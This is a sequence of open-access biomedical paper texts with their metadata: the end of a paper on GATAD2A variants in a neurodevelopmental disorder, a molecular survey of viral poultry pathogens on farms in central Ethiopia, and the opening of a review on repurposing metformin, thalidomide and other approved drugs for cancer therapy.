GATAD2A p.G402V is homologous to that of the previously identified GATAD2B p.G406R. 5,16 Together, these findings provide evidence for the pathogenicity of GATAD2A p.G402V and p.C420Y. We hypothesize different mechanisms of dysfunction for the p.T209I and p.I627Tfs variants, which do not localize to or disrupt the CR1 or CR2 interaction domains. For instance, the p.T209I variant lies within a region containing three PPPL4 motifs, which are important for GATAD2A interactions with ZMYND8 and the subsequent recruitment of 2A-NuRD to sites of DNA damage to assist in repair. 21 It remains unclear if there are other specific functions of the three PPPL4 motifs in neural development. The C-terminal p.I627Tfs variant, which lies within a previously unreported GATAD2 motif, may disrupt an important interaction with other as yet unknown proteins involved in 2A-NuRD (and likely 2B-NuRD) function. Alternatively, although less likely given its extreme C-terminal location, the frameshift variant may trigger mRNA or protein degradation, resulting in haploinsufficiency. Of course, this variant could also represent a benign change in an individual with a different developmental disorder. Additional cases will help to confirm GATAD2A-related pathogenicity in development and refine the GARND clinical spectrum.
Our human genetics findings suggest distinct but overlapping pathogenic mechanisms of variants in GATAD2 paralogs. It remains unclear if GATAD2A and GATAD2B provide full, partial, or no redundancy in NuRD function during development, and whether their functions are cell-type specific with minimal overlap of expression. In prior studies, GATAD2B overexpression failed to rescue a GATAD2A-related phenotype in GATAD2A-depleted induced pluripotent stem cells, potentially indicating non-redundancy with GATAD2B. 22 GATAD2B non-redundancy is also demonstrated by the unique GATAD2A interaction with ZMYND8 through PPPL4 domains, which are absent in GATAD2B. 21 To date, there are no specific assays of GATAD2B function and therefore there are no data to determine if GATAD2A could compensate for its deficiency. Additional work is necessary to assess the degree to which, if any, GATAD2B and GATAD2A compensatory activity mediates variable expressivity in or between GARND and/or GAND.
In summary, we report five unrelated individuals with heterozygous variants in GATAD2A and a neurodevelopmental disorder characterized by GDD, structural brain defects, and craniofacial dysmorphism. Discovery of additional affected individuals will provide further insight into the breadth of pathogenic genetic variation and constellation of clinical features associated with GARND.
Hospital Foundation. We would like to thank Dr. Steven Leber for interpretation of brain MRI findings. We would like to thank the contributors to GeneMatcher, MyGene2, and The University of Washington Center for Mendelian Genomics and GeneDx for use of data. Sequencing provided by the University of Washington Center for Mendelian Genomics (UW-CMG) was funded by NHGRI and NHLBI grants UM1 HG006493 and U24 HG008956. The content is solely the responsibility of the authors and does not necessarily represent the official views of the National Institutes of Health. This research was supported by NIH R01 DC018404 and the Ravitz Foundation Professorship granted to D.M.M., as well as the Fashion Industries Guild Endowed Fellowship for the Undiagnosed Diseases Program, the Cedars-Sinai Diana and Steve Marienhoff Fashion Industries Guild Endowed Fellowship in Pediatric Neuromuscular Diseases, and the Cedars-Sinai institutional funding program awarded to T.M.P. | 2023-04-22T15:07:28.530Z | 2023-04-01T00:00:00.000 | {
"year": 2023,
"sha1": "1cae50cb163548db2b82b1e297c9e7c208de6782",
"oa_license": "CCBYNCND",
"oa_url": "https://doi.org/10.1016/j.xhgg.2023.100198",
"oa_status": "GOLD",
"pdf_src": "PubMedCentral",
"pdf_hash": "e9f208456524d075ba7ea6e4783966bff2af3da8",
"s2fieldsofstudy": [
"Biology"
],
"extfieldsofstudy": [
"Medicine"
]
} |
245247799 | pes2o/s2orc | v3-fos-license | Molecular Survey of Viral Poultry Diseases with an Indirect Public Health Significance in Central Ethiopia
Simple Summary Poultry production is increasing, in Ethiopia as well, and poultry is an extremely valuable food resource. This survey investigated the presence of important viral pathogens in poultry (infectious bronchitis virus (IBV), avian metapneumovirus (aMPV), infectious bursal disease virus (IBDV) and Newcastle disease virus (NDV)) using biomolecular assays and sequencing. The results suggested a low circulation of these pathogens, probably owing to vaccination strategies. A routine diagnostic activity should be planned to monitor pathogen circulation and support disease prevention and production levels. Abstract The importance of poultry production is globally increasing, in Ethiopia as well, where high-quality protein and contained costs make poultry a valuable food resource. However, this entails some problems linked to rural, backyard and intensively reared flock proximity and pathogen circulation. This study is aimed at monitoring the presence of important viral pathogens in poultry (infectious bronchitis virus (IBV), avian metapneumovirus (aMPV), infectious bursal disease virus (IBDV) and Newcastle disease virus (NDV)) in Ethiopia. Respiratory and cloacal swabs and bursa of Fabricius and kidney imprints on FTA cards were collected in 2021 from 16 farms and tested for IBV, aMPV, NDV and IBDV. One farm was positive for IBDV, resulting in strains similar to those present in vaccines, belonging to genogroup A1a; two farms were positive for IBV but, due to sensitivity limits, only one sample was sequenced, resulting in a 4/91-like strain (GI-13); a layer farm tested positive for NDV with a Lasota-like vaccine strain. These findings suggest a low presence of these pathogens, probably due to the implementation of vaccination strategies, which is also testified by the detection of vaccine strains. A close diagnostic activity should be implemented on a routine basis in order to monitor pathogen circulation, ameliorate biosecurity measures and protect animal health and production levels.
Introduction
Poultry production is generally hindered by different diseases, and viral agents are among the most frequently occurring pathogens, especially in Ethiopia, where Newcastle disease (ND) and infectious bursal disease (IBD) are some of the major causes of morbidity and mortality [1][2][3][4]. These are high-priority viral poultry diseases in Ethiopia, since intensive poultry farming is growing but it is still flanked by rural and backyard flocks, which greatly differ in their health standards and rearing conditions [3]. To sustain intensive farming, exotic breeds are becoming more and more commonly raised, thus there is a higher host susceptibility due to suboptimal growth and productivity levels. This is considered to complicate the scenario, together with the possible pathogen introduction along with the new breeds [3]. At the same time, large populations of intensively reared chickens are surrounded by small farms and backyard flocks where biosecurity measures are not strict enough, animals of different ages are kept together or birds are not fully vaccinated due to costs, required expertise and the difficulty of purchasing vaccines for private owners [3].
On the other hand, despite the routine vaccinations being implemented on commercial poultry farms in Ethiopia, NDV outbreaks have been reported and mortality rate remains high [10]. Newcastle disease virus (NDV) is identified as a major killer, largely contributing to economic losses for the poultry sector in Ethiopia, and it is usually the first disease suspected during disease outbreaks [11]. Studies revealed that the majority of the virus strains circulating in village chickens in Ethiopia were virulent strains grouped in the sub-genotype VIf of class II viruses [12].
Infectious bursal disease virus (IBDV) is another common pathogen that usually affects young chickens and weakens their immune system, predisposing the birds to vaccination failure and opportunistic pathogens [13]. The mortality rates in Ethiopian chickens were reported to reach 50% [14]. Low biosecurity standards contribute to the spread of IBDV with risk factors such as visitors from different poultry houses, workers owning rural birds and vendor vehicles aggravating the transmission of the virus [15].
IBDV is an emerging disease in Ethiopia, and it was detected in 2002 for the first time [14]. Its circulation seems to be worsened by the adoption of exotic breeds of chickens, which are considered less resistant than indigenous breeds [16,17]. From the few commercial poultry farms situated in the central part of Ethiopia, in which the disease was first reported, IBDV has widely spread to other parts of the country (Berhanu et al., 2018). Studies have revealed that very virulent IBDV (vvIBDV) strains are circulating in Ethiopia (Shegu et al., 2020), and other work also reported that the Ethiopian IBDVs represented two genetic lineages: the very virulent (vv) IBDVs and variants of the classical attenuated vaccine strain (D78) [18] that is currently adopted, as well as other vaccines based on different strains: B2K, LC75, EXTREM and Winterfield-2512 [17,19].
Despite regular vaccination practices, IBDV is still found in Ethiopia involving both commercial and backyard poultry [20].
Avian infectious bronchitis (IB) is another important disease of poultry that affects the respiratory tract, gut, kidney and urogenital and reproductive systems of chickens [21].
Few studies conducted in different parts of Ethiopia have reported IBV seroprevalence to be high on both commercial and backyard chicken farms. Four serotypes of infectious bronchitis virus were identified from backyard and commercial farms in Ethiopia, namely M41 (GI-1), D-274 (GI-12), 793B (GI-13) and QX (GI-19) [22]. Hutton et al., (2017) also identified a strain belonging to the 793B genotype (GI-13), together with another study reporting the detection of 793B-like (GI-13) strains in distantly spaced backyard flocks, suggesting relevant viral circulation [1].
In these studies [1,2], the authors also detected aMPV subtype B, both in backyard and intensively raised flocks, with respiratory signs. aMPV is a respiratory pathogen whose importance is growing in poultry. Vaccination for aMPV is not commonly adopted in chickens, especially in Ethiopia, where it is currently unavailable [2], so the control of this agent mainly relies on biosecurity. The introduction of aMPV has also been tentatively linked to the importation of birds [1]. Mortality rates are usually low, except for cases of secondary infection that can result in severe forms, in particular with Escherichia coli [23].
These infections in poultry deeply affect production but they can also lead to a greater risk for human health, due to the increased susceptibility to both viral and bacterial secondary infection. For example, IBDV does not have any zoonotic potential, but its immunosuppressive nature could favor the replication of pathogens of zoonotic importance, such as Salmonella spp., Campylobacter spp. and Avian influenza virus [24,25].
Viral diseases are not well studied in most developing countries [2], and the few existing studies in Ethiopia were also largely based on serological tests, rather than on the molecular characterization of the circulating strains [26]. Scarce epidemiological knowledge limits the attempt for control of these diseases and the growth of poultry production.
In order to contribute towards a wider understanding of the epidemiology of the most common viral agents in poultry, the present study was designed to detect the presence of NDV, IBDV, IBV and aMPV and molecularly characterize the circulating strains among poultry farms in the Bishoftu and Mojo towns in Central Ethiopia.
Materials and Methods
This study was performed in March 2021, and it was centered on Bishoftu and Mojo towns, situated in the East Shewa zone of the Oromia region, Ethiopia. This area was purposely selected based on the large number of poultry farms located here. The sampled farms were further selected based on accessibility and the willingness of the owners to allow the sample collection.
Ten respiratory (pharyngeal and tracheal) and ten cloacal swabs were collected from each visited farm or shed on a farm. Before being pooled, both respiratory (pharyngeal and tracheal) and cloacal swabs were air dried separately for ten minutes and then placed in two different falcon vials. Additionally, FTA card imprints of the bursa of Fabricius and kidneys were collected from dead or moribund chickens humanely euthanized by manual cervical dislocation, on a broiler farm, where mortality was encountered at the time of visit. The FTA card imprints were then pooled based on the farm and shed. Along with the sample collection, different parameters of the farms and study population were recorded, such as number of sheds, total number of birds on the farms, age at sampling, genetic type, vaccination protocol, clinical signs, lesions, applied treatments and morbidity and mortality rates. The anamnestic data were then organized in a comprehensive database.
Samples were briefly stored at +4 °C until the end of the sample collection and then shipped at room temperature to the MAPS Department at Padua University (Italy), where laboratory analyses were conducted; samples were stored at −80 °C until processing, except for FTA cards, which were always kept at room temperature. The pooled swabs were resuspended in 2 mL of PBS and vortexed. FTA card imprints were cut, placed into 1.5 mL tubes, resuspended in 1 mL of PBS and vortexed. A 200 µL aliquot of each resuspended pool was used for nucleic acid extraction with a High Pure Viral Nucleic Acid Kit (Roche, Basel, Switzerland), and the extracted samples were then stored at −80 °C until further analyses.
Based on the matrix, samples were tested with different molecular assays for different pathogens according to their expected tropism: respiratory swabs were tested for IBV, aMPV and NDV; cloacal swabs were tested for IBV, IBDV and NDV; kidney FTA imprints were tested for IBV; bursa FTA imprints were tested for IBDV.
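The tropism-based testing scheme above can be summarized, purely as an illustration (this is not code from the study), as a small lookup table:

```python
# Illustrative lookup table for the matrix-to-assay plan described above.
ASSAY_PLAN = {
    "respiratory_swab": ["IBV", "aMPV", "NDV"],
    "cloacal_swab":     ["IBV", "IBDV", "NDV"],
    "kidney_FTA":       ["IBV"],
    "bursa_FTA":        ["IBDV"],
}

def assays_for(sample_matrix: str) -> list[str]:
    """Return the molecular assays scheduled for a given sample type."""
    return ASSAY_PLAN.get(sample_matrix, [])

print(assays_for("cloacal_swab"))  # ['IBV', 'IBDV', 'NDV']
```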
For aMPV detection and subtyping, a multiplex one-step real-time RT-PCR targeting the G gene [27] was performed using a SuperScript™ III One-Step qRT-PCR System with a Platinum™ Taq DNA Polymerase kit (Invitrogen™, Waltham, MA, USA) on a LightCycler ® 96 Instrument (Roche, Basel, Switzerland). Using the same kit and instrument, a preliminary screening for IBV was performed, targeting the UTR region [28]; then, a one-step RT-PCR targeting the hypervariable region of the S1 gene was used for further sequencing and characterization of IBV-positive samples [29]. For NDV detection, a one-step RT-PCR targeting the F gene was used [30]. For IBDV, a one-step RT-PCR targeting the VP2 gene was used [31].
All RT-PCRs were performed using a SuperScript™ III One-Step RT-PCR System with a Platinum™ Taq DNA Polymerase kit (Invitrogen™, Waltham, MA, USA) on an Applied Biosystems 2720 Thermal Cycler (Applied Biosystems, Waltham, MA, USA). Amplicon presence and specificity were examined by electrophoresis in SYBR™ Safe-stained (Invitrogen™, Waltham, MA, USA) agarose gels.
For strain characterization, positive samples for the various pathogens were Sanger sequenced in both directions with the same primer pairs of the RT-PCR assays used for amplification [29][30][31]. Positive samples were prepared for Sanger sequencing and shipped to the sequencing external service of Macrogen Spain (Madrid, Spain). Chromatograms were inspected for quality with FinchTV (Geospiza Inc., Seattle, WA, USA) and assembled in consensus sequences using ChromasPro 2.1.8 (Technelysium Pty Ltd., Helensvale, QLD, Australia). Nucleotide sequences were initially evaluated for specificity using a BLAST [32] search in order to be characterized. For phylogenetic analyses, the database proposed by Valastro et al., (2016) was used for IBV characterization; for IBDV strain characterization, the adopted reference database and classification were those published by Islam et al., (2021); then, for NDV classification, the latest and updated classification approach by Dimitrov et al., (2019) was used [33][34][35]. Sequences were aligned to reference datasets using the MEGA X [36] software for phylogenetic analyses. Phylogenetic trees were reconstructed using the Maximum Likelihood method, and branch support was calculated by performing 1000 bootstrap replicates [36].
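MEGA X is a GUI application; as a scriptable stand-in for readers who want a reproducible approximation, Biopython can bootstrap a consensus tree from the same kind of FASTA alignment. Note that this sketch uses neighbor-joining on an identity distance rather than the Maximum Likelihood method used in the study, and the input file name and replicate count are placeholders.

```python
# Neighbor-joining bootstrap consensus as a rough, scriptable analogue of the
# MEGA X ML workflow described above (illustrative only).
from Bio import AlignIO, Phylo
from Bio.Phylo.TreeConstruction import DistanceCalculator, DistanceTreeConstructor
from Bio.Phylo.Consensus import bootstrap_consensus, majority_consensus

msa = AlignIO.read("s1_alignment.fasta", "fasta")  # pre-aligned sequences (placeholder path)
constructor = DistanceTreeConstructor(DistanceCalculator("identity"), "nj")
tree = bootstrap_consensus(msa, 100, constructor, majority_consensus)  # 100 replicates for speed
Phylo.draw_ascii(tree)  # quick text rendering of the consensus tree
```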
Results
The sampling activity was conducted in March 2021, and a total of 54 pooled samples were collected from 16 farms, located in Bishoftu (10 farms) and Mojo (6 farms). The majority of the animals were layers and were sampled by collecting respiratory and cloacal swabs, while bursa and kidney imprints were collected from six different sheds on a broiler farm. Layers were sampled both on farms showing clinical signs, such as torticollis, neck twisting, swollen eyes, eye discharge, dyspnea, salivation, diarrhea, loss of feathers, swollen vent, weakness/listlessness, depression and leg paralysis, and on apparently healthy farms (five farms). Sampling on the broiler farm was performed because the birds showed hyperemic bursal tissue, a swollen or atrophied bursa, and urates in the kidneys at postmortem examination.
When applied, treatments ranged from vitamin supplements to antimicrobial drugs (oxytetracycline, sulfadiazine or norfloxacin) to coccidiostats (diclazuril and amprolium hydrochloride). The age of the layers ranged from 3 months to 1 year (mean 9.95 months), whereas broilers were 9 to 23 days old. The genetic types were Bovans Brown and Lohmann for layers and Cobb 500 for broilers. The population on the layer farms ranged from 150 to 12,000 birds (mean 3528.78), and the mean and median overall mortality rates were 3.25% and 0.33% (range 0-19.23%), respectively, with higher mortality on smaller farms (rearing fewer than 300 birds). On some farms, no official records of mortality were kept, and farmers reported an absence of mortality even though some deaths would be expected based on the type of birds reared and the management level. The birds were commonly vaccinated against Newcastle disease, infectious bursal disease, Marek's disease, fowl pox and fowl typhoid, while broilers were vaccinated against Newcastle disease, infectious bursal disease and also infectious bronchitis.
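The gap between the mean (3.25%) and median (0.33%) mortality reflects a right-skewed distribution driven by a few small, high-mortality farms; the toy calculation below (the values are made up, since per-farm records were not published) illustrates the effect.

```python
# Toy illustration of mean vs. median mortality under right skew
# (hypothetical values, not the study's raw farm records).
from statistics import mean, median

mortality_pct = [0.0, 0.0, 0.2, 0.33, 0.4, 0.5, 1.0, 9.0, 19.23]
print(f"mean = {mean(mortality_pct):.2f}%, median = {median(mortality_pct):.2f}%")
# -> mean = 3.41%, median = 0.40%: a few high-mortality small farms pull the
#    mean far above the median, the same pattern as the reported 3.25% vs 0.33%.
```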
All samples were negative for aMPV. Two out of 16 farms (12.5%) were positive for IBV by real-time RT-PCR screening, at high Ct values (>38); the three positive samples were one cloacal swab pool from a layer farm and two FTA card kidney imprints from the broiler farm. However, due to sensitivity limits, only one sample was successfully sequenced, yielding a 4/91-like strain (GI-13) [33] with 99.4% identity to the reference strain MT701511.1 (Figure 1).
The sample was collected from a layer farm located in Bishoftu town hosting 3-month-old birds with gastroenteric clinical signs and depression, where the birds were reportedly vaccinated with 1/96-based (GI-13) and mass-based (GI-1) vaccines. Only one cloacal swab pool, from a Lohmann layer farm of 1-year-old birds located in Mojo town, tested positive for NDV (1/15 layer farms, 6.7%), yielding a vaccine strain close to the LaSota strain (99.8% identity with strain AF077761) belonging to genotype II under the updated classification [35] (Figure 2). This vaccine was part of the vaccination protocol implemented on the positive farm, as reported by the farmer.

Figure 1. Phylogenetic analysis of the IBV strain [33]. The tree was reconstructed using the Maximum Likelihood method and the General Time Reversible model with a discrete Gamma distribution. Branch support is shown next to the branches. The Ethiopian strain is marked with a red circle; sequences belonging to the different lineages have been collapsed, and single branches represent unique variants.

Figure 2. Phylogenetic analysis of the NDV strain [35]. The tree was reconstructed using the Maximum Likelihood method and the Kimura 2-parameter model with a discrete Gamma distribution. Branch support is shown next to the branches. The Ethiopian strain is marked with a red circle.
All cloacal swabs from the layer farms tested negative for IBDV, whereas 3 out of 8 bursa imprint pools from the broiler farm (1/16 farms, 6.25%) were positive for IBDV, yielding sequences highly similar (99.8-100% identity) to the Winterfield-2512 vaccine strain (reference strain MH329181.1), which belongs to the classical/virulent genogroup A1a [34] (Figure 3). According to the declared vaccination strategy of the farm, this strain was used for bird immunization.

Figure 3. Phylogenetic analysis of the IBDV strains [34]. The tree was reconstructed using the Maximum Likelihood method and the Kimura 2-parameter model with a discrete Gamma distribution. Branch support is shown next to the branches. The Ethiopian strains are marked with a red circle.
Discussion
In the present study, detection of the investigated pathogens was limited to only four farms, each positive for a single agent (two farms for IBV, one for NDV and one for IBDV). Unfortunately, it was impossible to further characterize the two IBV detections from the broiler farm, while all the characterized strains appeared to be vaccine strains (a 4/91-like strain, a LaSota-like strain and a Winterfield-2512-like strain), indicating either persistence of the administered vaccine or the spread of vaccine strains from neighboring farms. The positive samples were collected from layer and broiler birds that were reportedly vaccinated against different viral diseases, including those investigated here (IBV, NDV and IBDV), with vaccines based on the detected strains in the case of IBDV and NDV. Regarding the IBV detection, the introduction of a vaccine-derived strain from an unknown source (farms implementing a different vaccine protocol, contaminated fomites or personnel) cannot be excluded, since the protocol applied on the farm involved different strains.
The persistence of a vaccine strain is a common finding when live vaccines are administered, because they can be shed in feces, taken up again by the birds and subsequently collected during sampling, complicating the diagnostic process. Within-flock circulation of live vaccines can also lead to vaccine reactions when the initial coverage of the birds is only partial [37]. This, however, does not fully explain the clinical signs recorded on the positive farms: on the farm where an IBV vaccine-like strain was detected, the reported signs (enteric signs, data not shown) differed from those of typical vaccine reactions. Furthermore, on the farm where an NDV vaccine-like strain was detected, no clinical signs were registered, which is the desired outcome. On the broiler farm where IBDV vaccine-like strains were detected, the main recorded lesions were urate deposits in the kidneys.
Even though, in some cases, the reported clinical signs might have been partially suggestive of the investigated pathogens, the actual cause should be ascribed to other problems, most likely of both infectious and managerial origin.
The absence of field strains is surprising, given that the local epidemiology and previous work reported the consistent presence of pathogens such as NDV [5,38], IBV [1,2] and IBDV [39,40]. This finding is also supported by the low mortality rates reported by some farmers. A certain seasonality, with a higher occurrence of NDV outbreaks during the pre-rainy season, has been proposed [41], and the timing of sampling (March) could have influenced the detection rate in the present study. Moreover, all farms declared that they vaccinate their birds, although they did not disclose the complete protocol. Vaccination surely plays a role in preventing viral circulation, together with possible previous natural infection, which could have contributed to acquired natural immunity; this was not investigated serologically in this study.
Vaccination in Ethiopia is often performed on the farm, at the hatchery or at the source before the animals are introduced to the farm, usually starting from one day of age [11]. In fact, Oromia, the region where the study was conducted, is one of the regions of Ethiopia with the highest accessibility to vaccination and veterinary services, as reported by Aswaf et al. (2021) [42].
Vaccination and biosecurity are the key factors in achieving disease control and efficient production, but these measures are often difficult to apply on rural or village farms. In this study, however, even small farms (<500 birds) were free from field strains, suggesting fair biosecurity levels, adequate prophylactic measures and limited contact with neighboring farms or other potential sources of infection.
Conclusions
The low circulation of these viruses in this region limits the risks associated with their role as door openers for secondary pathogens, which impact not only poultry production but also public health. In conclusion, this study presents a reassuring picture of the epidemiological situation in the Oromia region, Ethiopia, and stresses the importance of thorough monitoring, information sharing and the implementation of both vaccination strategies and biosecurity measures.
"year": 2021,
"sha1": "57a8c8b66542977d346f07015657e017ef45acf9",
"oa_license": "CCBY",
"oa_url": "https://www.mdpi.com/2076-2615/11/12/3564/pdf",
"oa_status": "GOLD",
"pdf_src": "MergedPDFExtraction",
"pdf_hash": "be066dda209df83d7a783311ed8032e5d24cc092",
"s2fieldsofstudy": [
"Agricultural And Food Sciences"
],
"extfieldsofstudy": [
"Medicine"
]
} |
Repurposing approved drugs for cancer therapy
Abstract

Background: Many drugs approved for other indications can control the growth of tumor cells and limit adverse events (AE).

Data sources: Literature searches with the keywords 'repurposing and cancer'; books; websites: https://clinicaltrials.gov/, and for drug structures: https://pubchem.ncbi.nlm.nih.gov/

Areas of agreement: Introducing approved drugs, such as those developed to treat diabetes (Metformin) or inflammation (Thalidomide), identified to have cytostatic activity, can enhance chemotherapy or even replace more cytotoxic drugs. Also, anti-inflammatory compounds, cytokines and inhibitors of proteolysis can be used to control the side effects of chemo- and immuno-therapies or as second-line treatments for tumors resistant to kinase inhibitors (KI). Drugs developed specifically for cancer therapy, such as interferons (IFN), the tyrosine kinase inhibitor (TKI) abivertinib and interleukin-6 (IL-6) receptor inhibitors, may help control symptoms of Covid-19.

Areas of controversy: Better knowledge of the mechanisms of drug activities is essential for repurposing. Chemotherapies induce ER stress and enhance mutation rates and chromosome alterations, leading to resistance that cannot always be related to mutations in the target gene. Metformin, thalidomide and cytokines (IFN, tumor necrosis factor (TNF), interleukin-2 (IL-2) and others) have pleiomorphic activities, some of which can enhance tumorigenesis. The small and fragile patient pools available for clinical trials can cloud the data on the usefulness of cotreatments.

Growing points: Better understanding of drug metabolism and mechanisms should aid in repurposing drugs for primary, adjuvant and adjunct treatments.

Areas timely for developing research: Optimizing drug combinations, reducing the cytotoxicity of chemotherapeutics and controlling associated inflammation.
Introduction
Using compounds approved for one clinical use in another disease or syndrome is referred to as 'repurposing'. Most of the drive for repurposing comes from the high cost of developing a drug and the very long time it can take to establish the safety and specificity of a completely new compound. The timeline for any new cancer drug to pass through enough clinical trials to obtain approval can be years, or even decades. Even for chronic myeloid leukemia (CML), which may affect about 0.2% of the population during their lifetime, over a decade was required for one of the first therapeutic KIs, Gleevec, to become standard of care. For smaller patient pools or drugs with less clear-cut results, the delay can be even longer. Approval of omacetaxine, a plant alkaloid that inhibits protein translation, for treating TKI-resistant CML took more than 30 years. 1 A phase 1 trial (NCT02081378) of asciminib (an allosteric inhibitor of the ABL kinase) for TKI-resistant CML and Philadelphia chromosome-positive acute lymphoblastic leukemia (ALL), which began in 2014, was still ongoing in August 2020, with an estimated completion date of 2024.
Repurposing, per se, is an old concept in oncology. Indeed, the first chemotherapy drugs might be regarded as repurposed chemical weapons, arising as they did from research on the 'mustard gas' (which has no relation to mustard and is liquid at room temperature) that caused so many deaths and chronic illness in the wars of the 20th century. While treating survivors of these attacks, doctors realized that the toxins, in addition to their vesicant (i.e. blister-inducing) activity, might have antitumor potential. In the medical equivalent of beating guns into plowshares, in this case converting a toxic compound to a therapeutic one, chemists and doctors worked together in a decade-long search for compounds with lower toxicity and enhanced cytostatic activity, with the hope of finding treatments to prolong the lives of their cancer patients. 2 After many explorations of conjugates with different biological molecules, two alkylating agents, chlorambucil (Leukeran) and busulfan (Myleran) (Fig. 1), were developed to treat chronic lymphocytic and myeloid leukemias (CLL and CML). Despite the advent of many other chemotherapies, these simple drugs continue to be used to this day.
This review will discuss two basic meanings of repurposing in cancer therapy. The first is adapting drugs used in other areas, for example anti-infectives or treatments for chronic diseases, for their observed cytostatic activity. 3 The second is using drugs that were designed primarily to treat other illnesses to enhance the effects of chemotherapy or manage side effects. Examples of these two areas are given below. Section 'Repurposing cancer therapies as antivirals and specifically anti-Covid-19 treatments' introduces the recent testing of cancer medications for treating Covid-19 infections and how this may have future benefit for repurposing in oncology.

Fig. 1 Alkylating agents used for treating leukemias, chlorambucil (left) and busulfan (Myleran, right), were patterned after toxic nitrogen mustard gas (center) over many design iterations. 3D chemical structures are from PubChem; atom colors are: carbon, gray; hydrogen, small white; nitrogen, blue; sulfur, yellow; chlorine, green; oxygen, red.
Adapting common drugs with cytostatic potential for cancer therapy
The great dream behind the many waves of cancer drug design is a drug that kills only cancer cells, leaving most normal cells untouched. No chemotherapy has ever achieved this lofty goal. Unlike the careful design of, for example, drugs targeting phosphorylation cascades 4,5 and orally available TKIs, 6 there is no clear cellular target for most early therapies. Chemotherapy infusions typically cannot be done at home, as there is a risk of anaphylaxis, and many agents are so toxic that accidental extravasation 7 can lead to difficult-to-treat blisters. Directing treatments to specific organs often leads to the escape of a few wayward bandits, abnormal cells that will eventually find their way into another tissue and reinitiate tumorigenesis. Oncologists are thus always on the lookout for drugs with fewer side effects that can be used to treat cancer as a chronic disease or even prevent it. 8,9 Drugs designed to treat many different indications have been introduced into cancer therapy, 10 and hundreds more have been reported to inhibit the growth of tumor cells in culture (see https://depmap.org/repurposing for the growth-inhibitory activity of approved drugs against 578 human cancer cell lines 11 ).
One area for repurposing is to replace current therapies with others that are cytostatic, rather than cytotoxic. Two repurposed drugs that have recently shown the most success are metformin, used since 1995 in the USA for diabetes, and thalidomide and its derivatives, which were developed to treat diseases such as psoriasis and inflammation related to infections.
Metformin as a cytostatic agent
Metformin (Fig. 2) traces its roots to a plant extract whose primary ingredient was guanidine, used throughout the Middle Ages to treat diabetes symptoms. 12 Metformin was first synthesized in 1922 but, owing to the advent of insulin, only advanced as 'Glucophage' 30 years later, when it was approved in France. It has since become the first-line treatment for type 2 diabetes. Pertinent to this review, metformin is playing an increasing role as a cytostatic cancer treatment, thanks to its low toxicity (its primary adverse event (AE) is the rarely occurring lactic acidosis). The first cancer trials arose from reports that diabetics taking metformin daily had lower rates of breast 13 and other cancers, augmented by studies showing that cells from metformin-treated diabetics do not grow well in culture. 14 The reported cytostatic effects led to introducing metformin as an adjunct therapy for different types of cancers, with remarkable success in some cases. In a recent phase II trial, 139 lung adenocarcinoma patients, whose tumors contained driver epidermal growth factor receptor (EGFR) mutations, were treated with TKIs (erlotinib hydrochloride, afatinib dimaleate or gefitinib at standard dosage) with or without 500 mg/day of metformin (i.e. well within the normal dosage for treating diabetes). Adding metformin increased progression-free survival (PFS) by about a third and nearly doubled overall survival (OS). 15 Metformin also improved PFS and OS in advanced, previously untreated non-small cell lung cancer (NSCLC) when combined with platinum-based chemotherapy, with or without the VEGF-inhibiting antibody bevacizumab (Avastin), in two phase II studies. These included 33 non-diabetic patients, of whom 70% had some history of smoking, with KRAS, EGFR and LKB1 mutation prevalences of 48, 26 and 8.3%, respectively. PFS and OS in metformin-treated patients were especially improved in those with KRAS mutations. This suggests that molecular subgroups should be used to guide therapy in the future, especially in light of the paucity of direct KRAS inhibitors. 16 As exciting as these results are, metformin does not always improve survival. 17 The effects seen in the various clinical trials, many of which are ongoing, are patient specific. Several metabolic pathways altered by metformin treatment may account for the heterogeneity in response. It might be logical to assume that the overall effect of metformin, by lowering circulating glucose concentration, would specifically starve tumor cells (which have an enhanced metabolic need for glucose), leading to decreased proliferation and metastasis. Various other explanations have been offered for its observed effects in diabetes and in preventing cell growth, 18 although the inability of metformin to enter many cells has not always been accounted for in studies of its effects on metabolism. 19 One is that metformin can metabolically reprogram cancer cells by activating 5′-AMP-activated kinase (AMPK), by increasing the ratio of AMP to ATP to some extent in cells (the ratio was much higher after rosiglitazone treatment). Other studies attributed the lower rates of breast cancer to metformin's role in controlling fatty acid oxidation. 20 Identifying the patients most likely to be helped relies on accurately identifying the cells most affected by metformin and determining whether those cell types predominate in a patient's tumor.
A study of normal murine mammary cells indicated that metformin had the greatest effect on hormone receptor-positive luminal cells, in which it decreased total cell number, progenitor capacity and DNA damage. The authors suggest that identifying this cell type in humans would indicate the patients most likely to benefit from metformin treatment. 21 To shed further light on this question, whole-transcriptome RNA sequencing 22 of 40 breast cancer patients before and after 13-21 days of dose-escalated metformin (from 500 mg/day to 1500 mg/day by day 6, still within the dose range for diabetes treatment) revealed patient profiles that correlated with an optimal antiproliferative response. One commonality was that metformin treatment increased glucose flux in the tumor (as measured by 18-fluorodeoxyglucose uptake via PET-CT) as well as in other tissues.
Thalidomide and derivatives in cancer therapy
Thalidomide derivatives have a variety of uses in modern cancer therapy. Indeed, someone who awoke suddenly from a 60-year sleep would be amazed that this notorious drug would be in such widespread use today. The clinical tragedy associated with its first introduction remains a cautionary tale for all involved in drug research. 23 Thalidomide was first developed to treat morning sickness and sold over the counter to pregnant women in Germany in the 1950s, with recommended doses in the range of aspirin treatments (300-500 mg). The drug's side effects, including peripheral neuropathy, stopped its approval in the USA. However, thalidomide was only withdrawn worldwide in 1962 after it was linked to severe birth defects. As discussed elsewhere, 23 even after this withdrawal, thalidomide remained in clinical use for treating Hansen disease (leprosy). The major use of thalidomide and its derivatives for many years was immunomodulatory. There are now a variety of thalidomide-related compounds to choose from that have been designed to specifically control different pathways in immune cells. The relatively low cost of treatment for this family of drugs means it can play a role in many cancer therapies, both for its tumor growth inhibition and its anti-inflammatory activities.
